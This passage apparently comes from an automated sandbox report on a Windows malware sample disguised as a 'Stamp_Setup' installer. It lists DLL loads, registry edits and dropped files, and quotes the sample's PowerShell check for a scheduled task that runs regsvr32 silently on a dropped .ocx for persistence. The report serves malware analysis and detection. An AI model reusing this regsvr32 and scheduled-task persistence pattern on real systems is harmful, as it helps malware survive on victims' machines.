          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpWindow found: window name: TMainFormJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Skinny Orange_is1Jump to behavior
          Source: SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeStatic PE information: Image base 0x140000000 > 0x60000000
          Source: SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: c:\zlib-dll\Release\isunzlib.pdb source: Stamp_Setup.tmp, 0000000A.00000003.2215454921.0000000002192000.00000004.00001000.00020000.00000000.sdmp, Stamp_Setup.tmp, 0000000A.00000003.2209826181.00000000031A0000.00000004.00001000.00020000.00000000.sdmp, Stamp_Setup.tmp, 0000000C.00000003.2236329531.0000000002230000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.10.dr

          Data Obfuscation

          barindex
          Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }"
          Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }"
          Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }"
          Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }"Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }"Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }"
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 1112, type: MEMORYSTR
          Source: _isdecmp.dll.12.drStatic PE information: real checksum: 0x0 should be: 0x5528
          Source: SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeStatic PE information: real checksum: 0xd40f1 should be: 0xd8e34
          Source: Stamp_Setup.tmp.9.drStatic PE information: real checksum: 0x0 should be: 0x12974f
          Source: _setup64.tmp.10.drStatic PE information: real checksum: 0x0 should be: 0x8546
          Source: is-H1DAG.tmp.12.drStatic PE information: real checksum: 0x12c91c should be: 0x134190
          Source: _setup64.tmp.12.drStatic PE information: real checksum: 0x0 should be: 0x8546
          Source: Stamp_Setup.tmp.11.drStatic PE information: real checksum: 0x0 should be: 0x12974f
          Source: is-T07R8.tmp.12.drStatic PE information: real checksum: 0x0 should be: 0x127a25
          Source: Stamp_Setup.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x16db80
          Source: _isdecmp.dll.10.drStatic PE information: real checksum: 0x0 should be: 0x5528
          Source: SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeStatic PE information: section name: .xdata
          Source: is-H1DAG.tmp.12.drStatic PE information: section name: .xdata
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFB4B0AD2A5 pushad ; iretd 15_2_00007FFB4B0AD2A6
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFB4B1C792B push ebx; retf 15_2_00007FFB4B1C796A
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFB4B08D2A5 pushad ; iretd 17_2_00007FFB4B08D2A6
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFB4B1A7215 pushad ; iretd 17_2_00007FFB4B1A7219
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFB4B1A793D push ebx; retf 17_2_00007FFB4B1A796A
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpFile created: C:\Users\user\AppData\Local\Temp\is-G7S57.tmp\_isetup\_setup64.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpFile created: C:\Users\user\AppData\Local\Temp\is-9STL2.tmp\_isetup\_shfoldr.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpFile created: C:\Users\user\AppData\Local\unins000.exe (copy)Jump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpFile created: C:\Users\user\AppData\Local\Temp\is-G7S57.tmp\_isetup\_shfoldr.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpFile created: C:\Users\user\AppData\Local\is-T07R8.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpFile created: C:\Users\user\AppData\Roaming\is-H1DAG.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpFile created: C:\Users\user\AppData\Local\Temp\is-G7S57.tmp\_isetup\_isdecmp.dllJump to dropped file
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeFile created: C:\Users\user\AppData\Roaming\Stamp_Setup.exeJump to dropped file
          Source: C:\Users\user\AppData\Roaming\Stamp_Setup.exeFile created: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpFile created: C:\Users\user\AppData\Local\Temp\is-9STL2.tmp\_isetup\_setup64.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpFile created: C:\Users\user\AppData\Local\Temp\is-9STL2.tmp\_isetup\_isdecmp.dllJump to dropped file
          Source: C:\Users\user\AppData\Roaming\Stamp_Setup.exeFile created: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpFile created: C:\Users\user\AppData\Roaming\9mpr_8.ocx (copy)Jump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
